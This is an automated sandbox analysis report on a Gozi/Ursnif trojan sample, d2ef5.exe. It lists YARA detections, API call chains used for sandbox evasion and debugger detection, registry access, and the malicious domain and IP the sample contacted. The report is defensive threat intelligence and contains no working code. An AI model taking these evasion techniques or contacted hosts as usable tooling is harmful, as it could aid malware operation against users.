Source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_fd494041 reference_sample = 0a1c1557bdb8c1b99e2b764fc6b21a07e33dc777b492a25a55cbd8737031e237, os = windows, severity = x86, creation_date = 2021-03-22, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = faabcdfb3402a5951ff1fde4f994dcb00ec9a71fb815b80dc1da9b577bf92ec2, id = fd494041-3fe8-4ffa-9ab8-6798032f1d66, last_modified = 2021-08-23
Source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTR Matched rule: Windows_Trojan_Gozi_261f5ac5 reference_sample = 31835c6350177eff88265e81335a50fcbe0dc46771bf031c836947851dcebb4f, os = windows, severity = x86, creation_date = 2019-08-02, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gozi, fingerprint = cbc8fec8fbaa809cfc7da7db72aeda43d4270f907e675016cbbc2e28e7b8553c, id = 261f5ac5-7800-4580-ac37-80b71c47c270, last_modified = 2021-08-23
Contains functionality to call native functions
Source: C:\Users\user\Desktop\d2ef5.exe Code function: 0_2_00401493 NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_00401493
Source: C:\Users\user\Desktop\d2ef5.exe Code function: 0_2_00401D95 GetProcAddress,NtCreateSection,memset, 0_2_00401D95
Source: C:\Users\user\Desktop\d2ef5.exe Code function: 0_2_00401F78 NtMapViewOfSection, 0_2_00401F78
Source: d2ef5.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: d2ef5.exe ReversingLabs: Detection: 88%
Source: d2ef5.exe Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: C:\Users\user\Desktop\d2ef5.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Users\user\Desktop\d2ef5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24}\InprocServer32 Jump to behavior
Source: classification engine Classification label: mal100.troj.evad.winEXE@1/0@3/1
Source: C:\Users\user\Desktop\d2ef5.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Users\user\Desktop\d2ef5.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\d2ef5.exe Code function: 0_2_0040134F LoadLibraryA,GetProcAddress, 0_2_0040134F

Hooking and other Techniques for Hiding and Protection
barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTR
Source: Yara match File source: 0.2.d2ef5.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.d2ef5.exe.10194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.569687253.0000000001019000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\d2ef5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\d2ef5.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion
barindex
Found evasive API chain (may stop execution after checking system information)
Source: C:\Users\user\Desktop\d2ef5.exe Evasive API call chain: NtQuerySystemInformation,DecisionNodes,Sleep
Source: C:\Users\user\Desktop\d2ef5.exe API call chain: ExitProcess graph end node

Anti Debugging
barindex
Found API chain indicative of debugger detection
Source: C:\Users\user\Desktop\d2ef5.exe Debugger detection routine: NtQueryInformationProcess or NtQuerySystemInformation, DecisionNodes, ExitProcess or Sleep
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\d2ef5.exe Code function: 0_2_0040134F LoadLibraryA,GetProcAddress, 0_2_0040134F
Contains functionality to query locales information (e.g. system language)
Source: C:\Users\user\Desktop\d2ef5.exe Code function: NtQuerySystemInformation,Sleep,GetLocaleInfoA,GetSystemDefaultUILanguage,VerLanguageNameA,GetLongPathNameW,GetLongPathNameW,GetLongPathNameW,CreateThread,QueueUserAPC,CloseHandle,GetLastError,TerminateThread,CloseHandle,SetLastError,WaitForSingleObject,GetExitCodeThread,CloseHandle,GetLastError,GetLastError, 0_2_00401493
Source: C:\Users\user\Desktop\d2ef5.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior
Source: C:\Users\user\Desktop\d2ef5.exe Code function: 0_2_004012B0 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError, 0_2_004012B0
Source: C:\Users\user\Desktop\d2ef5.exe Code function: 0_2_00401A49 GetSystemTimeAsFileTime,_aulldiv,_snwprintf,CreateFileMappingW,GetLastError,GetLastError,MapViewOfFile,GetLastError,CloseHandle,GetLastError, 0_2_00401A49

Stealing of Sensitive Information
barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTR
Source: Yara match File source: 0.2.d2ef5.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.d2ef5.exe.10194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.569687253.0000000001019000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality
barindex
Yara detected Ursnif
Source: Yara match File source: 00000000.00000003.441282479.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441258936.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441128955.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.440946252.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441227319.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.569972070.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441026847.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441081684.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000003.441301430.00000000015F8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: d2ef5.exe PID: 4684, type: MEMORYSTR
Source: Yara match File source: 0.2.d2ef5.exe.420000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.d2ef5.exe.10194a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.569687253.0000000001019000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
windows-stand
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 730728 Sample: d2ef5.exe Startdate: 26/10/2022 Architecture: WINDOWS Score: 100 13 Snort IDS alert for network traffic 2->13 15 Malicious sample detected (through community Yara rule) 2->15 17 Antivirus / Scanner detection for submitted sample 2->17 19 3 other signatures 2->19 5 d2ef5.exe 12 2->5         started        process3 dnsIp4 9 siwdmfkshsgw.com 194.58.112.174, 49695, 80 AS-REGRU Russian Federation 5->9 11 trackingg-protectioon.cdn1.mozilla.net 5->11 21 Found evasive API chain (may stop execution after checking system information) 5->21 23 Found API chain indicative of debugger detection 5->23 25 Writes or reads registry keys via WMI 5->25 27 Writes registry values via WMI 5->27 signatures5
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs

Contacted Public IPs

IP Domain Country Flag ASN ASN Name Malicious
194.58.112.174
 siwdmfkshsgw.com Russian Federation
197695 AS-REGRU true

Contacted Domains

Name IP Active
siwdmfkshsgw.com 194.58.112.174 true
trackingg-protectioon.cdn1.mozilla.net unknown unknown